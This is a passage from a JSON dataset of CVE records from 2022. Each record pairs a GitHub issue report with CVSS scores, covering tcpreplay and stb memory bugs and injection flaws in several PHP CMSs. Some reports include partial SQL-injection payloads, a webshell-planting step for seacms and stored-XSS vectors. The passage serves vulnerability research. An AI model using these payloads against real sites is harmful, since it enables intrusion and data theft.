  81673. "Issue_Created_At": "2022-03-04T08:24:03Z",
  81674. "description": "Bug] Reachable assertion in get_layer NUMBERTAG You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug The assertion APITAG in APITAG at APITAG is reachable when the user uses tcprewrite to open a crafted pcap file. To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG src/tcprewrite o /dev/null i POC output: ERRORTAG Expected behavior Program reports assertion failure and is terminated. Screenshots FILETAG System (please complete the following information): OS: Ubuntu OS version : can be reproduced in NUMBERTAG Clang version : clang NUMBERTAG release NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG",
  81675. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81676. "severity": "MEDIUM",
  81677. "baseScore": 5.5,
  81678. "impactScore": 3.6,
  81679. "exploitabilityScore": 1.8
  81680. },
  81681. {
  81682. "CVE_ID": "CVE-2022-27940",
  81683. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/718",
  81684. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/718",
  81685. "Repo_new": "appneta/tcpreplay",
  81686. "Issue_Created_At": "2022-03-04T08:32:27Z",
  81687. "description": "Bug] heap overflow in get_ip NUMBERTAG next. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in get_ip NUMBERTAG next, can be triggered via tcprewrite + APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG o /dev/null i POC output: ERRORTAG Screenshots FILETAG System (please complete the following information): OS: Ubuntu OS version : can be reproduced in NUMBERTAG clang version NUMBERTAG release NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG )",
  81688. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81689. "severity": "HIGH",
  81690. "baseScore": 7.8,
  81691. "impactScore": 5.9,
  81692. "exploitabilityScore": 1.8
  81693. },
  81694. {
  81695. "CVE_ID": "CVE-2022-27941",
  81696. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/716",
  81697. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/716",
  81698. "Repo_new": "appneta/tcpreplay",
  81699. "Issue_Created_At": "2022-03-03T19:41:11Z",
  81700. "description": "Bug] heap overflow in get_l2len_protocol. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in get_l2len_protocol, can be triggered via tcpprep + APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang NUMBERTAG export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG auto=bridge pcap=$POC PATHTAG Expected behavior APITAG report that ./tcpprep has a heap buffer overflow in function get_l2len_protocol ERRORTAG Screenshots FILETAG System (please complete the following information): OS: Ubuntu (can be reproduced in NUMBERTAG Tcpreplay Version (latest commit APITAG Additional context Add any other context about the problem here.",
  81701. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81702. "severity": "HIGH",
  81703. "baseScore": 7.8,
  81704. "impactScore": 5.9,
  81705. "exploitabilityScore": 1.8
  81706. },
  81707. {
  81708. "CVE_ID": "CVE-2022-27942",
  81709. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/719",
  81710. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/719",
  81711. "Repo_new": "appneta/tcpreplay",
  81712. "Issue_Created_At": "2022-03-14T09:44:16Z",
  81713. "description": "Bug] heap buffer overflow in parse_mpls. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a heap overflow bug found in parse_mpls, can be triggered via tcpprep+ APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG export CC=clang && export CFLAGS=\" fsanitize=address g NUMBERTAG FILETAG && ./configure disable shared disable local libopts && make clean && make j NUMBERTAG PATHTAG auto=bridge pcap=$POC PATHTAG Output: ERRORTAG System (please complete the following information): OS: Ubuntu NUMBERTAG Clang NUMBERTAG Tcpreplay Version : latest commit APITAG Acknowledgement FILETAG POC FILETAG",
  81714. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81715. "severity": "HIGH",
  81716. "baseScore": 7.8,
  81717. "impactScore": 5.9,
  81718. "exploitabilityScore": 1.8
  81719. },
  81720. {
  81721. "CVE_ID": "CVE-2022-27962",
  81722. "Issue_Url_old": "https://github.com/xunyang1/my-vulnerability/issues/1",
  81723. "Issue_Url_new": "https://github.com/xunyang1/my-vulnerability/issues/1",
  81724. "Repo_new": "xunyang1/my-vulnerability",
  81725. "Issue_Created_At": "2022-03-21T02:49:26Z",
  81726. "description": "Bluecms NUMBERTAG has an SQL injection vulnerability at cookie. APITAG Find by rerce Bluecms NUMBERTAG download page : FILETAG vulnerability code: FILETAG line NUMBERTAG FILETAG For the $user_name parameter above\uff0cjust passed in the addslashes function FILETAG Moreover, it can be seen from the configuration file that GB NUMBERTAG encoding is adopted, so wide byte injection can be considered to bypass addslashes. FILETAG When we enter Cookie: BLUE FILETAG payload: Cookie: BLUE FILETAG Successful delay NUMBERTAG s. APITAG The same problem appears on line NUMBERTAG FILETAG follow FILETAG Same as the previous problem. The $user_name parameter above\uff0cjust passed in the addslashes function APITAG BLUE FILETAG Successful delay NUMBERTAG s.",
  81727. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81728. "severity": "CRITICAL",
  81729. "baseScore": 9.8,
  81730. "impactScore": 5.9,
  81731. "exploitabilityScore": 3.9
  81732. },
  81733. {
  81734. "CVE_ID": "CVE-2022-27984",
  81735. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/30",
  81736. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/30",
  81737. "Repo_new": "cuppacms/cuppacms",
  81738. "Issue_Created_At": "2022-03-21T16:24:23Z",
  81739. "description": "SQL injection vulnerability exists in APITAG PATHTAG VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \"menu_filter NUMBERTAG parameters. Contact me: EMAILTAG APITAG Payload Boolean true: menu_filter NUMBERTAG and NUMBERTAG Payload Boolean false: menu_filter NUMBERTAG and NUMBERTAG Payload exploit example: APITAG Proof of concept (POC): FILETAG Payload Boolean true: menu_filter NUMBERTAG and NUMBERTAG FILETAG Payload Boolean false: menu_filter NUMBERTAG and NUMBERTAG You can see that the two return packets are different FILETAG Exploit: FILETAG",
  81740. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81741. "severity": "CRITICAL",
  81742. "baseScore": 9.8,
  81743. "impactScore": 5.9,
  81744. "exploitabilityScore": 3.9
  81745. },
  81746. {
  81747. "CVE_ID": "CVE-2022-27985",
  81748. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/31",
  81749. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/31",
  81750. "Repo_new": "cuppacms/cuppacms",
  81751. "Issue_Created_At": "2022-03-22T16:24:01Z",
  81752. "description": "SQL injection vulnerability exists in APITAG PATHTAG VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the APITAG parameters. Github: URLTAG Product: APITAG Impact: Allow attacker inject query and access , disclosure of all data on the system. Payload: ERRORTAG Proof of concept (POC): FILETAG You can see injection code query into APITAG parameters as show below You see database and user as show below in the response FILETAG",
  81753. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81754. "severity": "CRITICAL",
  81755. "baseScore": 9.8,
  81756. "impactScore": 5.9,
  81757. "exploitabilityScore": 3.9
  81758. },
  81759. {
  81760. "CVE_ID": "CVE-2022-28032",
  81761. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/263",
  81762. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/263",
  81763. "Repo_new": "thedigicraft/atom.cms",
  81764. "Issue_Created_At": "2022-03-21T09:10:59Z",
  81765. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG PATHTAG FILETAG payload:id=(sleep NUMBERTAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81766. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81767. "severity": "CRITICAL",
  81768. "baseScore": 9.8,
  81769. "impactScore": 5.9,
  81770. "exploitabilityScore": 3.9
  81771. },
  81772. {
  81773. "CVE_ID": "CVE-2022-28033",
  81774. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/259",
  81775. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/259",
  81776. "Repo_new": "thedigicraft/atom.cms",
  81777. "Issue_Created_At": "2022-03-21T08:09:03Z",
  81778. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: sleep NUMBERTAG FILETAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81779. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81780. "severity": "CRITICAL",
  81781. "baseScore": 9.8,
  81782. "impactScore": 5.9,
  81783. "exploitabilityScore": 3.9
  81784. },
  81785. {
  81786. "CVE_ID": "CVE-2022-28034",
  81787. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/261",
  81788. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/261",
  81789. "Repo_new": "thedigicraft/atom.cms",
  81790. "Issue_Created_At": "2022-03-21T08:36:04Z",
  81791. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: list FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81792. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81793. "severity": "CRITICAL",
  81794. "baseScore": 9.8,
  81795. "impactScore": 5.9,
  81796. "exploitabilityScore": 3.9
  81797. },
  81798. {
  81799. "CVE_ID": "CVE-2022-28035",
  81800. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/260",
  81801. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/260",
  81802. "Repo_new": "thedigicraft/atom.cms",
  81803. "Issue_Created_At": "2022-03-21T08:20:19Z",
  81804. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: action=save&db=users APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81805. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81806. "severity": "CRITICAL",
  81807. "baseScore": 9.8,
  81808. "impactScore": 5.9,
  81809. "exploitabilityScore": 3.9
  81810. },
  81811. {
  81812. "CVE_ID": "CVE-2022-28036",
  81813. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/262",
  81814. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/262",
  81815. "Repo_new": "thedigicraft/atom.cms",
  81816. "Issue_Created_At": "2022-03-21T08:58:14Z",
  81817. "description": "SQL Injection vulnerability on FILETAG . Exploit Title: SQL Injection vulnerability on FILETAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version: APITAG NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
  81818. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81819. "severity": "CRITICAL",
  81820. "baseScore": 9.8,
  81821. "impactScore": 5.9,
  81822. "exploitabilityScore": 3.9
  81823. },
  81824. {
  81825. "CVE_ID": "CVE-2022-28041",
  81826. "Issue_Url_old": "https://github.com/nothings/stb/issues/1292",
  81827. "Issue_Url_new": "https://github.com/nothings/stb/issues/1292",
  81828. "Repo_new": "nothings/stb",
  81829. "Issue_Created_At": "2022-02-17T15:52:07Z",
  81830. "description": "UBSAN: integer overflow. Describe the bug ERRORTAG and ERRORTAG To Reproduce Built stb according to FILETAG with ERRORTAG UBSAN Output ERRORTAG FILETAG",
  81831. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  81832. "severity": "MEDIUM",
  81833. "baseScore": 6.5,
  81834. "impactScore": 3.6,
  81835. "exploitabilityScore": 2.8
  81836. },
  81837. {
  81838. "CVE_ID": "CVE-2022-28042",
  81839. "Issue_Url_old": "https://github.com/nothings/stb/issues/1289",
  81840. "Issue_Url_new": "https://github.com/nothings/stb/issues/1289",
  81841. "Repo_new": "nothings/stb",
  81842. "Issue_Created_At": "2022-02-17T11:13:28Z",
  81843. "description": "APITAG heap use after free in stbi__jpeg_huff_decode. Describe the bug APITAG undefined behavior: index out of bounds + APITAG heap use after free in stbi__jpeg_huff_decode. To Reproduce Built stb according to FILETAG with ERRORTAG ASAN Output ERRORTAG Crashing file FILETAG",
  81844. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81845. "severity": "HIGH",
  81846. "baseScore": 8.8,
  81847. "impactScore": 5.9,
  81848. "exploitabilityScore": 2.8
  81849. },
  81850. {
  81851. "CVE_ID": "CVE-2022-28044",
  81852. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/216",
  81853. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/216",
  81854. "Repo_new": "ckolivas/lrzip",
  81855. "Issue_Created_At": "2022-02-24T18:06:02Z",
  81856. "description": "Deallocation of control->suffix corrupts heap memory. The suffix field in the APITAG structure is initialized to point to global memory in initialize_control URLTAG URLTAG and in the lrzip main URLTAG . URLTAG However, the field is then treated as a heap-allocated variable when freeing the APITAG variable, both in APITAG URLTAG and when setting a new suffix URLTAG Impact Corrupting the heap state may result in an exploitable vulnerability, especially if initialized with optarg that points to global RW memory. Fix It is sufficient to initialize APITAG using the return value of a strdup of the strings.",
  81857. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81858. "severity": "CRITICAL",
  81859. "baseScore": 9.8,
  81860. "impactScore": 5.9,
  81861. "exploitabilityScore": 3.9
  81862. },
  81863. {
  81864. "CVE_ID": "CVE-2022-28048",
  81865. "Issue_Url_old": "https://github.com/nothings/stb/issues/1293",
  81866. "Issue_Url_new": "https://github.com/nothings/stb/issues/1293",
  81867. "Repo_new": "nothings/stb",
  81868. "Issue_Created_At": "2022-02-17T15:56:39Z",
  81869. "description": "UBSAN: shift exponent is too large. Describe the bug Several ERRORTAG and similar To Reproduce Built stb according to FILETAG with ERRORTAG UBSAN Output ERRORTAG Crashing files FILETAG",
  81870. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81871. "severity": "HIGH",
  81872. "baseScore": 8.8,
  81873. "impactScore": 5.9,
  81874. "exploitabilityScore": 2.8
  81875. },
  81876. {
  81877. "CVE_ID": "CVE-2022-28053",
  81878. "Issue_Url_old": "https://github.com/typemill/typemill/issues/325",
  81879. "Issue_Url_new": "https://github.com/typemill/typemill/issues/325",
  81880. "Repo_new": "typemill/typemill",
  81881. "Issue_Created_At": "2022-03-20T02:42:15Z",
  81882. "description": "NUMBERTAG Unrestricted File Upload Vulnerability. See PDF for details FILETAG :",
  81883. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  81884. "severity": "HIGH",
  81885. "baseScore": 8.8,
  81886. "impactScore": 5.9,
  81887. "exploitabilityScore": 2.8
  81888. },
  81889. {
  81890. "CVE_ID": "CVE-2022-28056",
  81891. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/66",
  81892. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/66",
  81893. "Repo_new": "gongfuxiang/shopxo",
  81894. "Issue_Created_At": "2022-03-23T07:33:30Z",
  81895. "description": "A system reinstall vulnerability was found in APITAG Hello, in my code audit process, I found a system reinstallation vulnerability in APITAG NUMBERTAG the details are as follows: In the APITAG file\uff0c Add function. FILETAG It does not check the visitor's permissions, and also does not check whether the database is already installed (i.e. whether the APITAG exists). The add function then resets the original database data and writes the data submitted in the POST to APITAG , into which code can be injected, resulting in RCE FILETAG Below is the attacked APITAG CODETAG Then open any page to see the APITAG page",
  81896. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  81897. "severity": "CRITICAL",
  81898. "baseScore": 9.8,
  81899. "impactScore": 5.9,
  81900. "exploitabilityScore": 3.9
  81901. },
  81902. {
  81903. "CVE_ID": "CVE-2022-28059",
  81904. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/21",
  81905. "Issue_Url_new": "https://github.com/verytops/verydows/issues/21",
  81906. "Repo_new": "verytops/verydows",
  81907. "Issue_Created_At": "2022-03-23T13:54:45Z",
  81908. "description": "Verydows Exists Arbitrary File Deletion Vulnerability. Vulnerable file: PATHTAG It can be clearly seen that $file is not security filtered Vulnerable code\uff1a APITAG case 'delete': $file = request('file'); $error = APITAG if(!empty($file)) { if(is_array($file)) { foreach($file as $v) { APITAG $error FILETAG NUMBERTAG It can be seen that when the APITAG file exists, when visiting URLTAG the page will directly jump to the front home page FILETAG So as long as we delete the APITAG file, we can reinstall the APITAG we delete the APITAG file and visit URLTAG we will enter the installation wizard page FILETAG Repair suggestion: APITAG ../ or ..\\ in the file variable APITAG the scope of deleted files or directories",
  81909. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  81910. "severity": "HIGH",
  81911. "baseScore": 8.1,
  81912. "impactScore": 5.2,
  81913. "exploitabilityScore": 2.8
  81914. },
  81915. {
  81916. "CVE_ID": "CVE-2022-28067",
  81917. "Issue_Url_old": "https://github.com/sandboxie-plus/Sandboxie/issues/1714",
  81918. "Issue_Url_new": "https://github.com/sandboxie-plus/sandboxie/issues/1714",
  81919. "Repo_new": "sandboxie-plus/sandboxie",
  81920. "Issue_Created_At": "2022-03-23T03:02:42Z",
  81921. "description": "Sandbox breakout bug (details omitted). What happened? The details of this bug have been sent to MENTIONTAG by email on March NUMBERTAG This issue only serves to track the fixing process publicly. In short, I've found a bug in Sandboxie that presumably lets an attacker break out of the sandbox. This has yet to be confirmed by the developers, though. To Reproduce Described in the email. Expected behavior Sandboxed programs should not be allowed to escape. What is your Windows edition and version? Windows NUMBERTAG Home NUMBERTAG H2 APITAG NUMBERTAG bit In which Windows account you have this problem? A local or Microsoft account without special changes. Please mention any installed security software Built in realtime protection in Windows NUMBERTAG What version of Sandboxie are you running? Sandboxie Classic NUMBERTAG bit Is it a regression? _No response_ List of affected browsers _No response_ In which sandbox type you have this problem? I only reproduced it with Sandboxie Classic. Is the sandboxed program also installed outside the sandbox? No, it is not installed in the real system. Can you reproduce this problem on an empty sandbox? I can confirm it also on an empty sandbox. Did you previously enable some security policy settings outside Sandboxie? _No response_ Crash dump _No response_ Trace log _No response_ Sandboxie.ini configuration _No response_ Sandboxie Plus.ini configuration (for Plus interface issues) _No response_",
  81922. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  81923. "severity": "HIGH",
  81924. "baseScore": 8.6,
  81925. "impactScore": 4.0,
  81926. "exploitabilityScore": 3.9
  81927. },
  81928. {
  81929. "CVE_ID": "CVE-2022-28074",
  81930. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1769",
  81931. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1769",
  81932. "Repo_new": "halo-dev/halo",
  81933. "Issue_Created_At": "2022-03-24T10:15:41Z",
  81934. "description": "\u4e00\u4e9b\u5b89\u5168\u5efa\u8bae\uff0c\u5efa\u8bae\u9690\u85cf. What is version of Halo has the issue NUMBERTAG What database are you using? Other What is your deployment method? Fat Jar Your site address. _No response_ What happened? \u4f5c\u8005\u4f60\u597d\uff0c\u5728\u90e8\u7f72\u73af\u5883\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u4e86\u4e00\u4e9b\u95ee\u9898\u3002 \u5e0c\u671b\u5728\u4e0b\u4e00\u4e2a\u7248\u672c\u4e2d\uff0c\u80fd\u591f\u8fdb\u884c\u4e00\u4e9b\u5b89\u5168\u7684\u5347\u7ea7\u3002 \u5982\u4e0b\uff1a \u5bfc\u51fa\u7684\u6587\u4ef6\u672a\u52a0\u5bc6\uff0c\u53ef\u4ee5\u4fee\u6539\u5185\u5bb9\uff0c\u5b89\u5168\u9690\u60a3\uff1a \u7528\u6237\u5c06\u535a\u5ba2\u5907\u4efd\u5f00\u6e90\u5230\u4e92\u8054\u7f51\uff0c\u906d\u5230\u4fee\u6539\uff0c\u53ef\u80fd\u5bfc\u81f4\u5b58\u50a8\u578bxss FILETAG FILETAG FILETAG json data \u672a\u52a0\u5bc6 \u4f4d\u7f6e\uff1ablog_footer_info \u53ef\u5bfc\u81f4\uff0c\u5176\u4ed6\u4f4d\u7f6e\u4e5f\u4e00\u6837 \u6548\u679c\u5982\u4e0b\uff1a FILETAG \u4fee\u590d\u5efa\u8bae\uff1a \u5bf9\u5907\u4efd\u5185\u5bb9\u8fdb\u884c\u52a0\u5bc6\u3002\u3002\u3002 \u540c\u6837\u7684xss\uff0c\u4e5f\u53ef\u4ee5\u5728\u8be5\u4f4d\u7f6e\u5f97\u5230\u8bc1\u5b9e URLTAG FILETAG FILETAG Relevant log output _No response_ Additional information English report\uff1a \u00b7 FILETAG when i clicked APITAG label\uff0cthe options will be save... URLTAG allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the APITAG label FILETAG NUMBERTAG stored cross site scripting (XSS) vulnerability in The Database Backup feature. FILETAG FILETAG when i clicked APITAG label\uff0cthe json data will be exported. FILETAG this json data allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into after the APITAG option FILETAG if someone import this json data. this payload will be executed FILETAG FILETAG",
  81935. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  81936. "severity": "MEDIUM",
  81937. "baseScore": 4.8,
  81938. "impactScore": 2.7,
  81939. "exploitabilityScore": 1.7
  81940. },
  81941. {
  81942. "CVE_ID": "CVE-2022-28076",
  81943. "Issue_Url_old": "https://github.com/likCodinG/seacms_vul/issues/1",
  81944. "Issue_Url_new": "https://github.com/likcoding/seacms_vul/issues/1",
  81945. "Repo_new": "likCodinG/seacms_vul",
  81946. "Issue_Created_At": "2022-03-24T14:22:00Z",
  81947. "description": "seacms NUMBERTAG ulnerability Execution Command. APITAG in to the background, click System and then click Mail Server APITAG code in any box in the box below, take APITAG as an example, you need to write APITAG if you want to write a sentence Trojan, you can write ${ APITAG a])} (it can also be successfully connected after testing). APITAG APITAG refresh the page directly, or directly access PATHTAG in the root path APITAG APITAG",
  81948. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81949. "severity": "HIGH",
  81950. "baseScore": 7.2,
  81951. "impactScore": 5.9,
  81952. "exploitabilityScore": 1.2
  81953. },
  81954. {
  81955. "CVE_ID": "CVE-2022-28085",
  81956. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/480",
  81957. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/480",
  81958. "Repo_new": "michaelrsweet/htmldoc",
  81959. "Issue_Created_At": "2022-03-24T12:44:48Z",
  81960. "description": "APITAG heap buffer overflow in function pdf_write_names. Description Whilst experimenting with htmldoc , built from commit NUMBERTAG f NUMBERTAG URLTAG , we are able to induce a vulnerability in function APITAG , using a harness compiled from APITAG . Because there is no bounds checking, a heap-based out-of-bounds read will be triggered when the software encounters a malformed file, resulting in information disclosure or denial of service. Proof of Concept The POC is: poc_heap_overflow1 URLTAG The command is: `./htmldoc webpage t pdf f /dev/null poc_heap_overflow1 The ASAN report is: ERRORTAG Impact This vulnerability is capable of inducing information disclosure or denial of service.",
  81961. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  81962. "severity": "HIGH",
  81963. "baseScore": 7.8,
  81964. "impactScore": 5.9,
  81965. "exploitabilityScore": 1.8
  81966. },
  81967. {
  81968. "CVE_ID": "CVE-2022-28096",
  81969. "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/39",
  81970. "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/39",
  81971. "Repo_new": "zorlan/skycaiji",
  81972. "Issue_Created_At": "2022-03-25T10:45:07Z",
  81973. "description": "Remote code execution vulnerability in PATHTAG Vulnerability conditions Website Admin permissions Vulnerability details Location: PATHTAG L NUMBERTAG APITAG Code: ERRORTAG Vulnerability key code: ERRORTAG",
  81974. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  81975. "severity": "HIGH",
  81976. "baseScore": 7.2,
  81977. "impactScore": 5.9,
  81978. "exploitabilityScore": 1.2
  81979. },
  81980. {
  81981. "CVE_ID": "CVE-2022-28101",
  81982. "Issue_Url_old": "https://github.com/turtl/tracker/issues/404",
  81983. "Issue_Url_new": "https://github.com/turtl/tracker/issues/404",
  81984. "Repo_new": "turtl/tracker",
  81985. "Issue_Created_At": "2021-12-13T21:49:44Z",
  81986. "description": "Filter APITAG tags from notes. Notes allow APITAG tag injection. Ie, a note with the content APITAG opens a new browser window to Google. While this problem would happen over person to person sharing and thus the severity is limited (because you generally only share with those you trust) it remains high priority. Special thanks to Rafay Baloch and Muhammad Samak for this report.",
  81987. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  81988. "severity": "CRITICAL",
  81989. "baseScore": 9.0,
  81990. "impactScore": 6.0,
  81991. "exploitabilityScore": 2.3
  81992. },
  81993. {
  81994. "CVE_ID": "CVE-2022-28102",
  81995. "Issue_Url_old": "https://github.com/housamz/php-mysql-admin-panel-generator/issues/19",
  81996. "Issue_Url_new": "https://github.com/housamz/php-mysql-admin-panel-generator/issues/19",
  81997. "Repo_new": "housamz/php-mysql-admin-panel-generator",
  81998. "Issue_Created_At": "2022-03-25T20:50:21Z",
